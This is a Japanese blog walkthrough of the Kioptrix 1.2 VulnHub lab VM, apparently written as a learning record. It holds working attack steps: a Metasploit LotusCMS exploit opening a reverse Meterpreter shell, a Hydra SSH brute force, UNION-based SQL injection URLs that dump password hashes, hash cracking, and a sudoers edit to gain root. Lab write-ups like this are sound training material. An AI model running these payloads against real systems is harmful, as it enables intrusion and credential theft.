vulunhub Kioptrix 1.2 雑記
kioptrix 1.2
設定時に、仮想ディスクを作らずに後からIDEにディスクとして追加した方が良い?
pentest
ipの特定はいつもarp-scanでやっている。やったことないけど、HTBとかではnetdiscoverの方が良いのだろうか。
サービス調査
# nmap -p- 10.0.0.2 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-27 11:23 EDT Nmap scan report for 10.0.0.2 Host is up (0.00064s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:A5:42:DE (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 18.38 seconds # nmap -p22,80 -A 10.0.0.2 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-27 11:24 EDT Nmap scan report for 10.0.0.2 Host is up (0.00075s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA) |_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Ligoat Security - Got Goat? Security ... MAC Address: 08:00:27:A5:42:DE (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.75 ms 10.0.0.2 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 23.30 seconds
気になりどころ
- OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
- Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
詳細
OpenSSH 4.7p1
無し?
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
ここで、webの調査に入る前に、ダウンロードファイル解凍時に出てきた「README.txt」に従ってhostsファイルに「<target_ip> kioptrix3.com」を追加。
# echo "10.0.0.2 kioptrix3.com" >> /etc/hosts # nikto -h http://kioptrix3.com - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.0.0.2 + Target Hostname: kioptrix3.com + Target Port: 80 + Start Time: 2020-04-27 12:07:12 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch + Cookie PHPSESSID created without the httponly flag + Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 15:22:00 2009 + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch. + Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + /phpmyadmin/: phpMyAdmin directory found + OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + 7784 requests: 0 error(s) and 19 item(s) reported on remote host + End Time: 2020-04-27 12:07:37 (GMT-4) (25 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://kioptrix3.com ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon Apr 27 12:21:26 2020 URL_BASE: http://kioptrix3.com/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://kioptrix3.com/ ---- ==> DIRECTORY: http://kioptrix3.com/cache/ ==> DIRECTORY: http://kioptrix3.com/core/ + http://kioptrix3.com/data (CODE:403|SIZE:324) + http://kioptrix3.com/favicon.ico (CODE:200|SIZE:23126) ==> DIRECTORY: http://kioptrix3.com/gallery/ + http://kioptrix3.com/index.php (CODE:200|SIZE:1819) ==> DIRECTORY: http://kioptrix3.com/modules/ ==> DIRECTORY: http://kioptrix3.com/phpmyadmin/ + http://kioptrix3.com/server-status (CODE:403|SIZE:333) ==> DIRECTORY: http://kioptrix3.com/style/ ---- Entering directory: http://kioptrix3.com/cache/ ---- + http://kioptrix3.com/cache/index.html (CODE:200|SIZE:1819) ---- Entering directory: http://kioptrix3.com/core/ ---- ==> DIRECTORY: http://kioptrix3.com/core/controller/ + http://kioptrix3.com/core/index.php (CODE:200|SIZE:0) ==> DIRECTORY: http://kioptrix3.com/core/lib/ ==> DIRECTORY: http://kioptrix3.com/core/model/ ==> DIRECTORY: http://kioptrix3.com/core/view/ ---- Entering directory: http://kioptrix3.com/gallery/ ---- + http://kioptrix3.com/gallery/index.php (CODE:500|SIZE:5650) ==> DIRECTORY: http://kioptrix3.com/gallery/photos/ ==> DIRECTORY: http://kioptrix3.com/gallery/themes/ ---- Entering directory: http://kioptrix3.com/modules/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://kioptrix3.com/phpmyadmin/ ---- + http://kioptrix3.com/phpmyadmin/favicon.ico (CODE:200|SIZE:18902) + http://kioptrix3.com/phpmyadmin/index.php (CODE:200|SIZE:8136) ==> DIRECTORY: http://kioptrix3.com/phpmyadmin/js/ ==> DIRECTORY: http://kioptrix3.com/phpmyadmin/lang/ + http://kioptrix3.com/phpmyadmin/libraries (CODE:403|SIZE:340) + http://kioptrix3.com/phpmyadmin/phpinfo.php (CODE:200|SIZE:0) ==> DIRECTORY: http://kioptrix3.com/phpmyadmin/scripts/ ==> DIRECTORY: http://kioptrix3.com/phpmyadmin/themes/ ---- Entering directory: http://kioptrix3.com/style/ ---- + http://kioptrix3.com/style/admin.php (CODE:200|SIZE:356) + http://kioptrix3.com/style/index.php (CODE:200|SIZE:0) ---- Entering directory: http://kioptrix3.com/core/controller/ ---- + http://kioptrix3.com/core/controller/index.php (CODE:200|SIZE:0) ---- Entering directory: http://kioptrix3.com/core/lib/ ---- + http://kioptrix3.com/core/lib/index.php (CODE:200|SIZE:0) ---- Entering directory: http://kioptrix3.com/core/model/ ---- + http://kioptrix3.com/core/model/index.php (CODE:200|SIZE:0) ---- Entering directory: http://kioptrix3.com/core/view/ ---- + http://kioptrix3.com/core/view/index.php (CODE:200|SIZE:0) ---- Entering directory: http://kioptrix3.com/gallery/photos/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://kioptrix3.com/gallery/themes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://kioptrix3.com/phpmyadmin/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://kioptrix3.com/phpmyadmin/lang/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://kioptrix3.com/phpmyadmin/scripts/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://kioptrix3.com/phpmyadmin/themes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Mon Apr 27 12:21:42 2020 DOWNLOADED: 46120 - FOUND: 17
phpmyadmin?
phpmyadminのログインページでは何を入れてもログインぽくなる?。
うむ、分からん。
他にもLotusCMSのログインフォームを確認。
バージョン情報が無いしexploitの確実性が無い。
できれば、metasploit使いたくない。
LotusCMSに対してmetasploit使った場合
msf5 > search lotuscms Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/lcms_php_exec 2011-03-03 excellent Yes LotusCMS 3.0 eval() Remote Command Execution msf5 > use exploit/multi/http/lcms_php_exec msf5 exploit(multi/http/lcms_php_exec) > show options Module options (exploit/multi/http/lcms_php_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections URI /lcms/ yes URI VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic LotusCMS 3.0 msf5 exploit(multi/http/lcms_php_exec) > set rhosts 10.0.0.2 rhosts => 10.0.0.2 msf5 exploit(multi/http/lcms_php_exec) > set uri /index.php?system=Admin uri => /index.php?system=Admin msf5 exploit(multi/http/lcms_php_exec) > run [*] Started reverse TCP handler on 10.10.10.3:4444 [*] Using found page param: /index.php?page=index [*] Sending exploit ... [*] Sending stage (38288 bytes) to 10.0.0.2 [*] Meterpreter session 1 opened (10.10.10.3:4444 -> 10.0.0.2:45759) at 2020-04-27 13:51:14 -0400 meterpreter > getuid Server username: www-data (33) meterpreter > cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash meterpreter > sysinfo Computer : Kioptrix3 OS : Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 Meterpreter : php/linux
ここからhydraの辞書攻撃とかでsshパスワード特定。
# hydra -v -l loneferret -P /usr/share/wordlists/rockyou.txt 10.0.0.2 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-27 14:32:42 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking ssh://10.0.0.2:22/ (snip) [22][ssh] host: 10.0.0.2 login: loneferret password: starwars [STATUS] attack finished for 10.0.0.2 (waiting for children to complete tests) 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 13 final worker threads did not complete until end.
loneferretのsshパスワード「starwars」を特定。
dregのパスワードは解析が長いのであきらめた。
hydraの「-v」オプションはお好みかと。
SQLインジェクションアプローチ
kioptrix3.comのhomeから飛べる「gallery」を見る。
それぞれの画像は番号が振られているぽい。
SQLで管理の可能性。
sqlmap等自動化し過ぎツールはできるだけ使いたくない。
色々探し、次のサイトに辿り着く。
Hacking website using SQL Injection -step by step guide – Ethical Hacking Tutorials | Learn How to Hack | Hacking Tricks | Penetration Testing Lab
こんな感じでいけた。
http://kioptrix3.com/gallery/gallery.php?id=4'
SQLエラー発見
http://kioptrix3.com/gallery/gallery.php?id=4 order by 7--
列の数7-1=6列。
http://kioptrix3.com/gallery/gallery.php?id=-4 union select 1,2,3,4,5,6--
書き換えられそうな列は「2,3」であると判明。
phpmyadminでの謎ログインでmysqlであることは分かっていたのでmysqlのversionを確認してみる。
http://kioptrix3.com/gallery/gallery.php?id=-4 union select 1,@@version,3,4,5,6--
バージョンは「5.0.51a-3ubuntu5.4」と出た。とりあえずtableの列挙。
http://kioptrix3.com/gallery/gallery.php?id=-4 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()--
「dev_accounts,gallarific_comments,gallarific_galleries,gallarific_photos,gallarific_settings,gallarific_stats,gallarific_users」と沢山出てくる。
とりあえず「dev_accounts」狙いで。
tableは今後も決め打ちしかなさそう。
http://kioptrix3.com/gallery/gallery.php?id=-4 union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name = CHAR(100,101,118,95,97,99,99,111,117,110,116,115) --
「id,username,password」のcolumnを発見。
「CHAR(100,101,118,95,97,99,99,111,117,110,116,115)」は「dev_accounts」をASCIIコードにしただけ。
見つけたものを全部列挙していく。
http://kioptrix3.com/gallery/gallery.php?id=-4 union select 1,2,group_concat(id,username,password),4,5,6 from dev_accounts --
「1dreg0d3eccfb887aabd50f243b3f155c0f85,2loneferret5badcaf789d3d1d09794d8f021f40f0e」
なんとなく分かるけど見づらい。
http://kioptrix3.com/gallery/gallery.php?id=-4 union select 1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6 from dev_accounts --
:を挟んで見やすくした。
「1:dreg:0d3eccfb887aabd50f243b3f155c0f85,2:loneferret:5badcaf789d3d1d09794d8f021f40f0e」
では、このハッシュをクラックする。
# printf "0d3eccfb887aabd50f243b3f155c0f85\n5badcaf789d3d1d09794d8f021f40f0e"> hashes # john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes Using default input encoding: UTF-8 Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3]) Warning: no OpenMP support for this hash type, consider --fork=2 Press 'q' or Ctrl-C to abort, almost any other key for status starwars (?) Mast3r (?) 2g 0:00:00:02 DONE (2020-04-27 23:43) 0.9569g/s 5183Kp/s 5183Kc/s 5184KC/s Maswahu06..Mash2189 Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session completed # hashcat -m 0 hashes /usr/share/wordlists/rockyou.txt --force hashcat (v5.1.0) starting... (snip) 5badcaf789d3d1d09794d8f021f40f0e:starwars 0d3eccfb887aabd50f243b3f155c0f85:Mast3r Session..........: hashcat Status...........: Cracked Hash.Type........: MD5 Hash.Target......: hashes Time.Started.....: Mon Apr 27 23:49:51 2020 (9 secs) Time.Estimated...: Mon Apr 27 23:50:00 2020 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 1328.9 kH/s (0.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8 Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 10835968/14344384 (75.54%) Rejected.........: 0/10835968 (0.00%) Restore.Point....: 10833920/14344384 (75.53%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: MasterFate -> MarkBruce1 Started: Mon Apr 27 23:49:20 2020 Stopped: Mon Apr 27 23:50:00 2020
john the ripperとhashcat使って見たけど、何も考えずにやるならjohnの方が簡単そう。GPU積んであるPCで、ホストで解析できる環境ならちゃんと設定してhashcatの方が良いかもしれない。
shell取ってroot
# rlwrap ssh loneferret@10.0.0.2 loneferret@10.0.0.2's password: Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ Last login: Tue Apr 28 01:29:56 2020 from 10.10.10.3 loneferret@Kioptrix3:~$ ls CompanyPolicy.README checksec.sh loneferret@Kioptrix3:~$ cat CompanyPolicy.README Hello new employee, It is company policy here to use our newly installed software for editing, creating and viewing files. Please use the command 'sudo ht'. Failure to do so will result in you immediate termination. DG CEO loneferret@Kioptrix3:~$ sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: !/usr/bin/su (root) NOPASSWD: /usr/local/bin/ht loneferret@Kioptrix3:~$ sudo ht /etc/sudoers Error opening terminal: xterm-256color. loneferret@Kioptrix3:~$ export TERM=xterm loneferret@Kioptrix3:~$ sudo ht /etc/sudoers [1]+ Stopped sudo ht /etc/sudoers loneferret@Kioptrix3:~$ sudo /bin/sh # id uid=0(root) gid=0(root) groups=0(root)
rlwrapはおススメなので使ってみるべし。
「CompanyPolicy.README」にはガバガバセキュリティポリシーが書いてある。
sudo -l
でも権限確認したけど、やっぱガバガバ。
sudo ht
で何かエラー吐いたので、xtermにしてみた。
ht editorでは、f3キーで「/etc/sudoers」開き直して、「loneferret」のアクセスに「/bin/sh」を追加する。または、dregの「/bin/sh」へのアクセスを書き加える。
# cd /root # ls Congrats.txt ht-2.0.18 # cat Congrats.txt Good for you for getting here. Regardless of the matter (staying within the spirit of the game of course) you got here, congratulations are in order. Wasn't that bad now was it. Went in a different direction with this VM. Exploit based challenges are nice. Helps workout that information gathering part, but sometimes we need to get our hands dirty in other things as well. Again, these VMs are beginner and not intented for everyone. Difficulty is relative, keep that in mind. The object is to learn, do some research and have a little (legal) fun in the process. I hope you enjoyed this third challenge. Steven McElrea aka loneferret http://www.kioptrix.com Credit needs to be given to the creators of the gallery webapp and CMS used for the building of the Kioptrix VM3 site. Main page CMS: http://www.lotuscms.org Gallery application: Gallarific 2.1 - Free Version released October 10, 2009 http://www.gallarific.com Vulnerable version of this application can be downloaded from the Exploit-DB website: http://www.exploit-db.com/exploits/15891/ The HT Editor can be found here: http://hte.sourceforge.net/downloads.html And the vulnerable version on Exploit-DB here: http://www.exploit-db.com/exploits/17083/ Also, all pictures were taken from Google Images, so being part of the public domain I used them.
rootのディレクトリにはお祝い文があった。
終わり
自動化ツール使うよりも中身理解が楽しい。